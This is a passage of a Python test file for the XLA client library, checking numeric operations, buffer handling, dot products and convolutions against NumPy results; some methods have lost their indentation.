ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSum2D(self, dtype):
    """Elementwise Add of two constant 2x3 arrays."""
    c = self._NewComputation()
    ops.Add(
        ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
        ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
    self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSum2DWith1DBroadcastDim0(self, dtype):
    """Add broadcasts a 1D operand along dimension 0 of a 2D operand."""
    # sum of a 2D array with a 1D array where the latter is replicated across
    # dimension 0 to match the former's shape.
    c = self._NewComputation()
    ops.Add(
        ops.Constant(c,
                     np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
                              dtype=dtype)),
        ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
        broadcast_dimensions=(0,))
    self._ExecuteAndCompareClose(
        c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testSum2DWith1DBroadcastDim1(self, dtype):
    """Add broadcasts a 1D operand along dimension 1 of a 2D operand."""
    # sum of a 2D array with a 1D array where the latter is replicated across
    # dimension 1 to match the former's shape.
    c = self._NewComputation()
    ops.Add(
        ops.Constant(c,
                     np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
                              dtype=dtype)),
        ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
        broadcast_dimensions=(1,))
    self._ExecuteAndCompareClose(
        c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testConstantAxpy(self, dtype):
    """Computes a*x + y (axpy) with constant operands."""
    c = self._NewComputation()
    ops.Add(
        ops.Mul(
            ops.Constant(c, dtype(2)),
            ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
        ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
    # rtol is loose enough to accommodate low-precision float dtypes.
    self._ExecuteAndCompareClose(
        c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
  def testCustomCall(self):
    """Invokes a registered CPU custom-call target (f32 subtraction)."""
    if self.backend.platform != "cpu":
      self.skipTest("Test requires cpu platform")
    c = self._NewComputation()
    # Register every custom-call target exposed by the test helper module.
    for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
      xla_client.register_custom_call_target(name, fn, platform="cpu")
    ops.CustomCallWithLayout(
        c,
        b"test_subtract_f32",
        operands=[
            ops.Constant(c, np.float32(1.25)),
            ops.Constant(c, np.float32(0.5))
        ],
        shape_with_layout=xla_client.Shape.array_shape(
            np.dtype(np.float32), (), ()),
        operand_shapes_with_layout=[
            xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
            xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
        ])
    self._ExecuteAndCompareClose(c, expected=[0.75])
# Register the test case so the harness instantiates it per backend.
tests.append(ComputationsWithConstantsTest)
class ComputationFromProtoTest(absltest.TestCase):
  """Test computation execution from HLO proto."""

  def setUp(self):
    super(ComputationFromProtoTest, self).setUp()
    self.backend = xla_backend()

  def testExecuteFromProto(self):
    """Round-trips 1 + 2 through a serialized HLO module proto."""
    # Serialize a computation that adds two int32 constants.
    builder = xla_client.XlaBuilder("computation")
    ops.Add(
        ops.Constant(builder, np.int32(1)),
        ops.Constant(builder, np.int32(2)))
    proto_bytes = builder.build().as_serialized_hlo_module_proto()
    # Deserialize, compile, and execute it.
    computation = xla_client.XlaComputation(proto_bytes)
    ans, = xla_client.execute_with_python_values(
        self.backend.compile(computation), (), backend=self.backend)
    np.testing.assert_equal(ans, np.int32(3))
# Register the test case so the harness instantiates it per backend.
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
  """Tests focusing on Parameter ops and argument-passing."""

  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in int_dtypes)
  def testScalarTimesVector(self, dtype):
    """Multiplies a scalar parameter by a vector parameter."""
    c = self._NewComputation()
    scalar = np.array(3, dtype=dtype)
    vector = np.array([10, 15, -2, 7], dtype=dtype)
    param0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(scalar))
    param1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(vector))
    ops.Mul(param0, param1)
    self._ExecuteAndCompareExact(
        c, arguments=[scalar, vector], expected=[scalar * vector])

  # TODO(phawkins): test comparison harness doesn't support bfloat16
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes if dtype != bfloat16)
  def testScalarMinusVectorExplicitNumbering(self, dtype):
    """Subtracts a scalar parameter from a vector parameter.

    Uses explicit numbering and declares parameter 1 before parameter 0.
    Sub is used since it's not commutative and can help catch parameter
    reversal within the computation.
    """
    c = self._NewComputation()
    scalar = np.array(2.0, dtype=dtype)
    vector = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
    param1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(vector))
    param0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(scalar))
    ops.Sub(param1, param0)
    self._ExecuteAndCompareClose(
        c, arguments=[scalar, vector], expected=[vector - scalar])
# Register the test case so the harness instantiates it per backend.
tests.append(ParametersTest)
class BufferTest(ComputationTest):
  """Tests focusing on execution with Buffers."""

  def testConstantSum(self):
    """Adds two f32 constants; no arguments are passed at execution."""
    c = self._NewComputation()
    ops.Add(
        ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
    self._ExecuteAndCompareClose(c, expected=[4.25])

  def testOneParameterSum(self):
    """Adds a single f32 parameter to a constant."""
    c = self._NewComputation()
    ops.Add(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
        ops.Constant(c, np.float32(3.14)))
    self._ExecuteAndCompareClose(
        c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])

  def testTwoParameterSum(self):
    """Adds two f32 parameters."""
    c = self._NewComputation()
    ops.Add(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
        ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
    self._ExecuteAndCompareClose(
        c,
        arguments=[NumpyArrayF32(1.11),
                   NumpyArrayF32(3.14)],
        expected=[4.25])

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testCannotCallWithDeletedBuffers(self):
    """Executing with a deleted argument buffer raises RuntimeError."""
    c = self._NewComputation()
    ops.Add(
        ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
        ops.Constant(c, np.float32(3.14)))
    arg = NumpyArrayF32(1.11)
    compiled_c = self.backend.compile(c.build())
    arg_buffer = self.backend.buffer_from_pyval(arg)
    arg_buffer.delete()
    with self.assertRaises(RuntimeError):
      compiled_c.execute([arg_buffer])

  def testXlaShape(self):
    """A device buffer reports the XLA shape (dims, element type) of its value."""
    pyval = np.array([[1., 2.]], np.float32)
    local_buffer = self.backend.buffer_from_pyval(pyval)
    xla_shape = local_buffer.xla_shape()
    self.assertEqual(xla_shape.dimensions(), (1, 2))
    self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))

  def testXlaShapeIndex(self):
    """ShapeIndex objects compare by value, not identity."""
    a = xla_client.ShapeIndex((1, 2))
    b = xla_client.ShapeIndex((1, 2))
    c = xla_client.ShapeIndex((2, 3))
    self.assertEqual(a, b)
    self.assertNotEqual(b, c)

  def testBlockHostUntilReadyWorks(self):
    """block_host_until_ready on a live buffer completes without error."""
    arg = np.array([[1., 2.]], np.float32)
    arg_buffer = self.backend.buffer_from_pyval(arg)
    arg_buffer.block_host_until_ready()
    # This test merely checks that nothing goes awry when we call
    # block_host_until_ready(); it's difficult to test anything else.

  def testBlockHostUntilReadyRaisesOnDeletedBuffer(self):
    """block_host_until_ready on a deleted buffer raises RuntimeError."""
    arg = np.array([[1., 2.]], np.float32)
    buffer = self.backend.buffer_from_pyval(arg)
    buffer.delete()
    with self.assertRaisesRegex(
        RuntimeError,
        re.escape(
            "BlockHostUntilReady() called on deleted or donated buffer")):
      buffer.block_host_until_ready()

  def testDeviceArrayBaseSignatures(self):
    """Checks the ndarray-like surface of DeviceArrayBase subclasses."""
    # When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
    # and thus needs to correctly implement the following methods.
    arg = np.array([[1., 2., 3.]], np.float32)
    buffer = self.backend.buffer_from_pyval(arg)
    if not isinstance(buffer, xla_client.DeviceArrayBase):
      # Fixed grammar in the skip message ("objectof ... do not").
      raise unittest.SkipTest(
          "The object of type {} does not extend DeviceArrayBase".format(
              type(buffer)))
    self.assertEqual(buffer.__array_priority__, 100)
    self.assertEqual(buffer.shape, (1, 3))
    self.assertEqual(buffer.dtype, np.float32)
    self.assertEqual(buffer.size, 3)
    self.assertEqual(buffer.ndim, 2)
    self.assertIs(buffer, buffer.block_until_ready())
    buffer.delete()
    with self.assertRaises(RuntimeError):
      buffer.block_until_ready()

  def testOnDeviceSizeInBytes(self):
    """on_device_size_in_bytes is 0 for empty arrays, positive otherwise."""
    if not isinstance(self.backend, xla_client.Client):
      self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
    arg0 = np.array([])
    arg1 = np.array([[0., 1., 2.]], np.float32)
    arg2 = np.array([[3., 4., 5.]], bfloat16)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    arg2_buffer = self.backend.buffer_from_pyval(arg2)
    self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
    # OnDeviceSizeInBytes varies depending on the platform. Confirm there's
    # a reasonable value.
    self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
    self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)

  def testLiveBuffers(self):
    """live_buffers lists un-deleted buffers, most recently created first."""
    if not isinstance(self.backend, xla_client.Client):
      self.skipTest("TPU Driver doesn't support LiveBuffers().")
    self.assertEmpty(self.backend.live_buffers())
    arg0 = np.array([])
    arg1 = np.array([[0., 1., 2.]], np.float32)
    arg2 = np.array([[3., 4., 5.]], bfloat16)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    arg2_buffer = self.backend.buffer_from_pyval(arg2)
    self.assertLen(self.backend.live_buffers(), 3)
    self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
    self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
    self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
    arg1_buffer.delete()
    self.assertLen(self.backend.live_buffers(), 2)
    self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
    self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
    arg0_buffer.delete()
    arg2_buffer.delete()
    self.assertEmpty(self.backend.live_buffers())

  def testCopyToHost(self):
    """copy_to_host_async prefetches; duplicate or late calls are no-ops."""
    arg0 = np.array([[1., 2.]], np.float32)
    arg1 = np.array([[3., 4.]], np.float32)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    # Prefetch two buffers using copy_to_host_async, and then retrieve their
    # values using to_py.
    arg0_buffer.copy_to_host_async()
    arg0_buffer.copy_to_host_async()  # Duplicate calls don't do anything.
    arg1_buffer.copy_to_host_async()
    np.testing.assert_equal(arg0, arg0_buffer.to_py())
    np.testing.assert_equal(arg1, arg1_buffer.to_py())
    # copy_to_host_async does nothing after to_py is called.
    arg0_buffer.copy_to_host_async()
    np.testing.assert_equal(arg0, arg0_buffer.to_py())

  def testDevice(self):
    """Buffers placed on an explicit device report that device."""
    x = np.arange(8, dtype=np.int32)
    for device in self.backend.local_devices():
      buf = self.backend.buffer_from_pyval(x, device=device)
      self.assertEqual(buf.device(), device)
      np.testing.assert_equal(x, buf.to_py())

  def testStandardTypes(self):
    """Round-tripping through a buffer preserves the scalar element type."""
    for dtype in standard_dtypes:
      # bfloat16 and complex128 are excluded from this round-trip check.
      if dtype == bfloat16 or dtype == np.complex128:
        continue
      arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
      arr = arr.to_py()
      self.assertEqual(dtype, type(arr[0]))

  def testUnsafeBufferPointer(self):
    """unsafe_buffer_pointer returns a non-negative device address."""
    if not isinstance(self.backend, xla_client.Client):
      self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
    arg0 = np.array([])
    arg1 = np.array([[0., 1., 2.]], np.float32)
    arg2 = np.array([[3., 4., 5.]], bfloat16)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    arg2_buffer = self.backend.buffer_from_pyval(arg2)
    self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
    self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
    self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testClone(self):
    """clone() yields a distinct buffer object aliasing the same memory."""
    x = np.array([[3., 4., 5.]], np.float32)
    y = self.backend.buffer_from_pyval(x)
    z = y.clone()
    # Bug fix: compare the buffer with its clone (y vs. z). The original
    # compared the numpy input with the buffer (id(x) vs. id(y)), which is
    # trivially true for two distinct objects and so asserted nothing.
    self.assertNotEqual(id(y), id(z))
    np.testing.assert_array_equal(y.to_py(), z.to_py())
    # The clone shares the underlying device memory.
    self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testJaxAttributesHaveCorrectDefaults(self):
    """JAX-specific buffer attributes default to None."""
    x = np.array([[3., 4., 5.]], np.float32)
    y = self.backend.buffer_from_pyval(x)
    self.assertIsNone(y.aval)
    self.assertIsNone(y._device)
# Register the test case so the harness instantiates it per backend.
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes)
  def testConcatenate(self, dtype):
    """ConcatInDim joins two vectors along dimension 0."""
    c = self._NewComputation()
    args = (
        ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
        ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
    )
    ops.ConcatInDim(c, args, dimension=0)
    self._ExecuteAndCompareExact(
        c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
  # pyformat: disable
  @parameterized.named_parameters(
      {
          "testcase_name": "_{}_{}".format(src_dtype.__name__,
                                           dst_dtype.__name__),
          "src_dtype": src_dtype,
          "dst_dtype": dst_dtype,
      }
      for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
      for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
  # pyformat: enable
  def testBitcastConvertType(self, src_dtype, dst_dtype):
    """BitcastConvertType reinterprets bits, matching ndarray.view."""
    if (np.float64 in (src_dtype, dst_dtype) and
        self.backend.platform == "tpu"):
      self.skipTest("TPU doesn't support float64")
    c = self._NewComputation()
    x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
    ops.BitcastConvertType(
        ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
    result = xla_client.execute_with_python_values(
        self.backend.compile(c.build()), (), backend=self.backend)
    self.assertLen(result, 1)
    # Same-width bit reinterpretation, so compare against numpy's view().
    expected = x.view(dst_dtype)
    self.assertEqual(result[0].shape, expected.shape)
    self.assertEqual(result[0].dtype, expected.dtype)
    np.testing.assert_equal(result[0], expected)
  # TODO(b/123523486) implement AllToAll on CPU
  def DISABLED_testAllToAllOneReplica(self):
    """AllToAll over a single replica is the identity (disabled; see TODO)."""
    samples = [
        NumpyArrayF32([97.0]),
        NumpyArrayF32([64.0, 117.0]),
        NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
    ]
    # Only the first (1D) sample is exercised while the op is disabled on CPU.
    for lhs in samples[:1]:
      c = self._NewComputation()
      ops.AllToAll(ops.Constant(c, lhs), 0, 0)
      self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
  def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
    """CrossReplicaSum with the singleton replica group [[0]] is identity."""
    samples = [
        NumpyArrayF32(42.0),
        NumpyArrayF32([97.0]),
        NumpyArrayF32([64.0, 117.0]),
        NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
    ]
    for lhs in samples:
      c = self._NewComputation()
      ops.CrossReplicaSum(
          ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
      self._ExecuteAndCompareExact(c, expected=[lhs])
  # TODO(phawkins): np.dot implementation doesn't support bfloat16
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes if dtype != bfloat16)
  def testDotMatrixVector(self, dtype):
    """Dot of a 2x2 matrix with a 2x1 matrix matches np.dot."""
    c = self._NewComputation()
    lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
    rhs = np.array([[10.0], [20.0]], dtype=dtype)
    ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
    self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
  # TODO(phawkins): np.dot implementation doesn't support bfloat16
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes if dtype != bfloat16)
  def testDotMatrixMatrix(self, dtype):
    """Dot of two 2x2 matrices matches np.dot."""
    c = self._NewComputation()
    lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
    rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
    ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
    self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
  def testDotGeneralWithDotDimensionNumbersProto(self):
    """DotGeneral accepts a hand-built DotDimensionNumbers proto."""
    c = self._NewComputation()
    rng = np.random.RandomState(0)
    lhs = NumpyArrayF32(rng.randn(10, 3, 4))
    rhs = NumpyArrayF32(rng.randn(10, 4, 5))
    # Contract lhs dim 2 with rhs dim 1; batch over dim 0 of both operands.
    dimension_numbers = xla_client.DotDimensionNumbers()
    dimension_numbers.lhs_contracting_dimensions.append(2)
    dimension_numbers.rhs_contracting_dimensions.append(1)
    dimension_numbers.lhs_batch_dimensions.append(0)
    dimension_numbers.rhs_batch_dimensions.append(0)
    ops.DotGeneral(
        ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
    self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
  def testDotGeneralWithPrecisionConfig(self):
    """DotGeneral honors an explicit per-operand PrecisionConfig."""
    c = self._NewComputation()
    rng = np.random.RandomState(0)
    lhs = NumpyArrayF32(rng.randn(10, 3, 4))
    rhs = NumpyArrayF32(rng.randn(10, 4, 5))
    dimension_numbers = xla_client.make_dot_dimension_numbers(
        (([2], [1]), ([0], [0])))
    # Request elevated precision for each operand (one entry per operand).
    config = xla_client.PrecisionConfig()
    config.operand_precision.append(config.Precision.HIGH)
    config.operand_precision.append(config.Precision.HIGHEST)
    ops.DotGeneral(
        ops.Constant(c, lhs),
        ops.Constant(c, rhs),
        dimension_numbers,
        precision_config=config)
    self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
  def testConvGeneralDilatedF32(self):
    """ConvGeneralDilated with LHS dilation and asymmetric padding (NCHW)."""
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 1, 2, 3)
    rhs = a(1, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NCHW", "OIHW", "NCHW"), 2)
    ops.ConvGeneralDilated(
        ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
        lhs_dilation, rhs_dilation, dimension_numbers)
    result = np.array([[[
        [0., 0., 0.],
        [10., 20., 0.],
        [0., 0., 0.],
        [40., 50., 0.],
    ]]])
    self._ExecuteAndCompareClose(c, expected=[result])
  def testConvGeneralDilatedF32WithPrecisionConfig(self):
    """Same convolution as testConvGeneralDilatedF32, with a PrecisionConfig."""
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 1, 2, 3)
    rhs = a(1, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NCHW", "OIHW", "NCHW"), 2)
    # One precision entry per operand (lhs, rhs).
    config = xla_client.PrecisionConfig()
    config.operand_precision.append(config.Precision.HIGHEST)
    config.operand_precision.append(config.Precision.DEFAULT)
    ops.ConvGeneralDilated(
        ops.Constant(c, lhs),
        ops.Constant(c, rhs),
        strides,
        pads,
        lhs_dilation,
        rhs_dilation,
        dimension_numbers,
        precision_config=config)
    result = np.array([[[
        [0., 0., 0.],
        [10., 20., 0.],
        [0., 0., 0.],
        [40., 50., 0.],
    ]]])
    self._ExecuteAndCompareClose(c, expected=[result])
  def testConvGeneralDilatedPermutedF32(self):
    """ConvGeneralDilated with permuted input/output layouts (NHWC/CWNH)."""
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 1, 2, 3)
    rhs = a(1, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NHWC", "OIHW", "CWNH"), 2)
    # The lhs is transposed to NHWC to match the declared input layout, and
    # the expected result is transposed to the declared CWNH output layout.
    ops.ConvGeneralDilated(
        ops.Constant(c, np.transpose(lhs,
                                     (0, 2, 3, 1))), ops.Constant(c, rhs),
        strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
    result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
                         [40., 50., 0.]]]])
    self._ExecuteAndCompareClose(
        c, expected=[np.transpose(result, (1, 3, 0, 2))])
  def testConvGeneralDilatedGroupedConvolutionF32(self):
    """Grouped convolution: feature_group_count=2 splits input channels."""
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 2, 2, 3)
    rhs = a(2, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NCHW", "OIHW", "NCHW"), 2)
    feature_group_count = 2
    ops.ConvGeneralDilated(
        ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
        lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
    result = np.array([[[
        [0., 0., 0.],
        [10., 20., 0.],
        [0., 0., 0.],
        [40., 50., 0.],
    ], [
        [0., 0., 0.],
        [330., 380., 160.],
        [0., 0., 0.],
        [480., 530., 220.],
    ]]])
    self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
